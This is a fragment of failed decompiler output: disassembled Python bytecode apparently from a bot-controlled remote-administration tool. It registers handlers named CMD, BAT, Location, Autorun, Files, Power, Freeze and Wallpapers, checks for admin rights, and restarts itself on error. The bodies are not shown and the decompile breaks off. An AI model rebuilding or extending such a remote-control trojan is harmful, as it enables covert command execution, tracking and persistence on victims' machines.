             2862  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1143      2864  LOAD_CODE                <code_object Freeze>
             2866  LOAD_STR                 'Freeze'
             2868  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2870  CALL_FUNCTION_1       1  ''
             2872  STORE_NAME               Freeze

 L.1165      2874  LOAD_NAME                bot
             2876  LOAD_ATTR                message_handler
             2878  LOAD_STR                 '/DVD'
             2880  LOAD_CONST               ('regexp',)
             2882  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1166      2884  LOAD_CODE                <code_object DVD>
             2886  LOAD_STR                 'DVD'
             2888  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2890  CALL_FUNCTION_1       1  ''
             2892  STORE_NAME               DVD

 L.1193      2894  LOAD_NAME                bot
             2896  LOAD_ATTR                message_handler
             2898  LOAD_STR                 '/CMD'
             2900  LOAD_CONST               ('regexp',)
             2902  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1194      2904  LOAD_CODE                <code_object CMD>
             2906  LOAD_STR                 'CMD'
             2908  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2910  CALL_FUNCTION_1       1  ''
             2912  STORE_NAME               CMD

 L.1228      2914  LOAD_NAME                bot
             2916  LOAD_ATTR                message_handler
             2918  LOAD_STR                 '/BAT'
             2920  LOAD_CONST               ('regexp',)
             2922  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1229      2924  LOAD_CODE                <code_object BAT>
             2926  LOAD_STR                 'BAT'
             2928  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2930  CALL_FUNCTION_1       1  ''
             2932  STORE_NAME               BAT

 L.1250      2934  LOAD_NAME                bot
             2936  LOAD_ATTR                message_handler
             2938  LOAD_STR                 '/Location'
             2940  LOAD_CONST               ('regexp',)
             2942  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1251      2944  LOAD_CODE                <code_object Location>
             2946  LOAD_STR                 'Location'
             2948  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2950  CALL_FUNCTION_1       1  ''
             2952  STORE_NAME               Location

 L.1287      2954  LOAD_NAME                bot
             2956  LOAD_ATTR                message_handler
             2958  LOAD_STR                 '/Info'
             2960  LOAD_CONST               ('regexp',)
             2962  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1288      2964  LOAD_CODE                <code_object Info>
             2966  LOAD_STR                 'Info'
             2968  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2970  CALL_FUNCTION_1       1  ''
             2972  STORE_NAME               Info

 L.1324      2974  LOAD_NAME                bot
             2976  LOAD_ATTR                message_handler
             2978  LOAD_STR                 'Help'
             2980  LOAD_STR                 'help'
             2982  BUILD_LIST_2          2 
             2984  LOAD_CONST               ('commands',)
             2986  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1325      2988  LOAD_CODE                <code_object Help>
             2990  LOAD_STR                 'Help'
             2992  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             2994  CALL_FUNCTION_1       1  ''
             2996  STORE_NAME               Help

 L.1386      2998  LOAD_NAME                bot
             3000  LOAD_ATTR                message_handler
             3002  LOAD_STR                 '3'
             3004  LOAD_STR                 '6'
             3006  BUILD_LIST_2          2 
             3008  LOAD_CONST               ('commands',)
             3010  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1387      3012  LOAD_CODE                <code_object Main>
             3014  LOAD_STR                 'Main'
             3016  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3018  CALL_FUNCTION_1       1  ''
             3020  STORE_NAME               Main

 L.1390      3022  LOAD_NAME                bot
             3024  LOAD_ATTR                message_handler
             3026  LOAD_STR                 '2'
             3028  LOAD_STR                 '5'
             3030  BUILD_LIST_2          2 
             3032  LOAD_CONST               ('commands',)
             3034  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1391      3036  LOAD_CODE                <code_object Main>
             3038  LOAD_STR                 'Main'
             3040  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3042  CALL_FUNCTION_1       1  ''
             3044  STORE_NAME               Main

 L.1394      3046  LOAD_NAME                bot
             3048  LOAD_ATTR                message_handler
             3050  LOAD_STR                 '4'
             3052  LOAD_STR                 '1'
             3054  BUILD_LIST_2          2 
             3056  LOAD_CONST               ('commands',)
             3058  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1395      3060  LOAD_CODE                <code_object Main>
             3062  LOAD_STR                 'Main'
             3064  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3066  CALL_FUNCTION_1       1  ''
             3068  STORE_NAME               Main

 L.1398      3070  LOAD_NAME                bot
             3072  LOAD_ATTR                message_handler
             3074  LOAD_STR                 'Power'
             3076  LOAD_STR                 'power'
             3078  BUILD_LIST_2          2 
             3080  LOAD_CONST               ('commands',)
             3082  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1399      3084  LOAD_CODE                <code_object Power>
             3086  LOAD_STR                 'Power'
             3088  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3090  CALL_FUNCTION_1       1  ''
             3092  STORE_NAME               Power

 L.1402      3094  LOAD_NAME                bot
             3096  LOAD_ATTR                message_handler
             3098  LOAD_STR                 'Autorun'
             3100  LOAD_STR                 'autorun'
             3102  BUILD_LIST_2          2 
             3104  LOAD_CONST               ('commands',)
             3106  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1403      3108  LOAD_CODE                <code_object Autorun>
             3110  LOAD_STR                 'Autorun'
             3112  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3114  CALL_FUNCTION_1       1  ''
             3116  STORE_NAME               Autorun

 L.1406      3118  LOAD_NAME                bot
             3120  LOAD_ATTR                message_handler
             3122  LOAD_STR                 'Files'
             3124  LOAD_STR                 'files'
             3126  BUILD_LIST_2          2 
             3128  LOAD_CONST               ('commands',)
             3130  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1407      3132  LOAD_CODE                <code_object Files>
             3134  LOAD_STR                 'Files'
             3136  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3138  CALL_FUNCTION_1       1  ''
             3140  STORE_NAME               Files

 L.1410      3142  LOAD_NAME                bot
             3144  LOAD_ATTR                message_handler
             3146  LOAD_STR                 'Cancel'
             3148  BUILD_LIST_1          1 
             3150  LOAD_CONST               ('commands',)
             3152  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1411      3154  LOAD_CODE                <code_object CancelFiles>
             3156  LOAD_STR                 'CancelFiles'
             3158  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3160  CALL_FUNCTION_1       1  ''
             3162  STORE_NAME               CancelFiles

 L.1414      3164  LOAD_NAME                bot
             3166  LOAD_ATTR                message_handler
             3168  LOAD_STR                 'Wallpapers'
             3170  LOAD_STR                 'wallpapers'
             3172  BUILD_LIST_2          2 
             3174  LOAD_CONST               ('commands',)
             3176  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'

 L.1415      3178  LOAD_CODE                <code_object Wallpapers>
             3180  LOAD_STR                 'Wallpapers'
             3182  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             3184  CALL_FUNCTION_1       1  ''
             3186  STORE_NAME               Wallpapers

 L.1419      3188  SETUP_FINALLY      3206  'to 3206'

 L.1420      3190  LOAD_NAME                bot
             3192  LOAD_ATTR                polling
             3194  LOAD_CONST               True
             3196  LOAD_CONST               ('none_stop',)
             3198  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
             3200  POP_TOP          
             3202  POP_BLOCK        
             3204  JUMP_FORWARD       3236  'to 3236'
           3206_0  COME_FROM_FINALLY  3188  '3188'

 L.1421      3206  POP_TOP          
             3208  POP_TOP          
             3210  POP_TOP          

 L.1422      3212  LOAD_NAME                os
             3214  LOAD_METHOD              startfile
             3216  LOAD_NAME                CurrentPath
             3218  CALL_METHOD_1         1  ''
             3220  POP_TOP          

 L.1423      3222  LOAD_NAME                sys
             3224  LOAD_METHOD              exit
             3226  CALL_METHOD_0         0  ''
             3228  POP_TOP          
             3230  POP_EXCEPT       
             3232  JUMP_FORWARD       3236  'to 3236'
             3234  <48>             
           3236_0  COME_FROM          3232  '3232'
           3236_1  COME_FROM          3204  '3204'

Parse error at or near `<117>' instruction at offset 1298

Instruction context:
   
 L. 150      1294  LOAD_NAME                AdminRightsRequired
                1296  LOAD_CONST               True
->              1298  <117>                 0  ''
            1300_1302  POP_JUMP_IF_FALSE  1382  'to 1382'

test/102712.pyc -- 
# decompile failed
